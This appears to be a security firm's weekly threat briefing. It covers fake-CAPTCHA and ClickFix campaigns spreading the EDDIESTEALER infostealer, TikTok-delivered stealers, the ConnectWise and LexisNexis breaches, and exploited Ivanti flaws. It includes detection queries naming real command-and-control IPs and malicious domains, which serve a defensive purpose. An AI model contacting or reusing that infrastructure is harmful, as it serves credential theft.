This week, we briefed our clients on new research that shows ClickFix & Fake CAPTCHA are thriving. We also discussed recent breaches that made the news.
KEY TAKEAWAYS
Cyber-extortion group Scattered Spider campaign against retail industry shifts focus to the U.S. Learn their TTPs and how to protect against them.
Critical vulnerabilities in Fortinet, Cisco, SonicWall, Google Chrome, and ASUS. Patch now!
ClickFix & Fake CAPTCHA is an increasingly common technique used by threat actors to gain initial access. Threat actors either compromised legitimate websites or host their own sites that prompt the user to copy malicious code and trick them into running it on their system.
Fig. 1: Fake CAPTCHA prompt | Source: Elastic Security
This technique is commonly used to deliver either infostealer malware or loader malware that further infects the victim with additional malicious payloads such as ransomware.
Fake CAPTCHA Pushes EDDIESTEALER
New research from Elastic Security details a new infostealer written in Rust being distributed via fake CAPTCHA sites called EDDIESTEALER. This infostealer targets user data including credentials, browser information, and cryptocurrency wallets. One notable detail in Elastic's research is EDDIESTEALER's ability to extract data from web browsers. The malware authors implemented a Rust-based version of ChromeKatz, a utility for dumping sensitive data from memory of Chromium-based browsers. This allows the malware to harvest data such as cookies and session data. Elastic's research also shows EDDIESTEALERS's ability to manipulate Chrome browsers into dumping plaintext credentials stored in its Password Manager.
Beyond ClickFix
Researchers at TrendMicro detailed a new campaign that is delivering Vidar and StealC infostealer malware via TikTok videos. The delivery method is a similar concept to ClickFix, where the user is tricked into running malicious code themselves via the Windows Run prompt. However, instead of a fake error message or fake CAPTCHA page that give the user instructions, AI-generated videos on TikTok convince users to run the malicious code claiming it will either activate or unlock premium features in software. The end result is the same; the user is tricked into running malicious PowerShell code that downloads malware onto the victim's computer.
How to Protect Your Organization
Find it in PacketWatch
PacketWatch query for EDDIESTEALER C2 IPs:
\*.ip:(45.144.53.145 OR 84.200.154.47)
PacketWatch query for EDDIESTEALER domain infrastructure:
http.host:(shiglimugli.xyz OR xxxivi.com OR llll.fit OR plasetplastik.com OR militrex.wiki)
Resources:
ConnectWise
On May 28, ConnectWise disclosed they observed suspicious activity they believe is tied to a nation-state actor in their ScreenConnect cloud environment. The notification states it impacted only a small amount of customers, and that each impacted customer has been notified directly by ConnectWise. While the advisory did not disclose exactly how the intrusion happened, it does contain several mentions of a patch they released on April 24 for CVE-2025-3935. Administrators are advised to ensure they patch ScreenConnect to version 25.2.4 or higher. PacketWatch will continue to monitor this incident for further details.
LexisNexis
LexisNexis Risk Solutions, a data analytics company that is used by the majority of Fortune 500 companies, disclosed that threat actors stole PII data for over 364,000 individuals in December 2024. The PII data includes name, phone number, email address, postal address, social security number, driver's license number and date of birth. Investigation of the breach shows the data was harvested from GitHub (3rd party infrastructure) and not LexisNexis itself.
Resources:
Vulnerability Roundup
A pair of medium-severity vulnerabilities in Ivanti Endpoint Manager Mobile (EPMM) version 12.5.0.0 and earlier was disclosed on May 15. Tracked as CVE-2025-4427 and CVE-2025-4428, these vulnerabilities can be chained together to achieve unauthenticated remote code execution (RCE). Research from EclecticIQ show these vulnerabilities were actively exploited as 0-days by a Chinese espionage group tracked as UNC5221. Proof-of-concept exploit code for these vulnerabilities is also in the wild. Administrators are urged to patch as soon as possible. As Ivanti products are heavily targeted by threat actors due to a multitude of high and critical severity vulnerabilities in recent years, if organizations choose to continue using this product, they should be heavily monitored for unusual activity.
The following vulnerabilities were added to CISA's Known Exploited Vulnerabilities Catalog in the last 2 weeks:
This report is provided FREE to the cybersecurity community.
Visit our Cyber Threat Intelligence Blog for additional reports.
Subscribe to be notified of future Reports:
NOTE
We have enhanced our report with data from SOCRadar. You may need to register to view their threat intelligence content.
DISCLAIMER
Kindly be advised that the information contained in this article is presented with no final evaluation and should be considered raw data. The sole purpose of this information is to provide situational awareness based on the currently available knowledge. We recommend exercising caution and conducting further research as necessary before making any decisions based on this information.